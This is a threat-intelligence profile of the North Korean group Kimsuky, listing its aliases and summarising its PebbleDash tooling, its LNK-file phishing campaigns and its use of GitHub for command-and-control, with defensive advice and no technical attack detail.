Kimsuky
Also known as: Velvet Chollima, Emerald Sleet, Black Banshee, Thallium
North Korean intelligence gathering. Credential phishing campaigns.
Associated Intelligence
Kimsuky Targets Orgs with PebbleDash
Kimsuky, a known threat actor, has been using new PebbleDash-based tools in recent campaigns, targeting various organizations. The tools are connected to the AppleSeed malware cluster, indicating a potential escalation in threat activity. Organizations should review their security controls to ensure they are prepared to detect and respond to such threats.
DPRK Phishing Attacks
North Korea-linked hackers are targeting South Korean organizations with phishing emails containing malicious LNK files. The attacks use GitHub as command and control (C2) servers and drop a decoy PDF and a PowerShell script. Affected organizations should be cautious of suspicious emails and inspect attachments carefully.
DPRK Hackers Use GitHub as C2
Threat actors linked to North Korea have been observed using GitHub as command-and-control infrastructure in multi-stage attacks targeting South Korean organizations. The attacks involve obfuscated Windows shortcut files that drop a decoy PDF. Affected organizations should review their security controls and monitor for suspicious activity.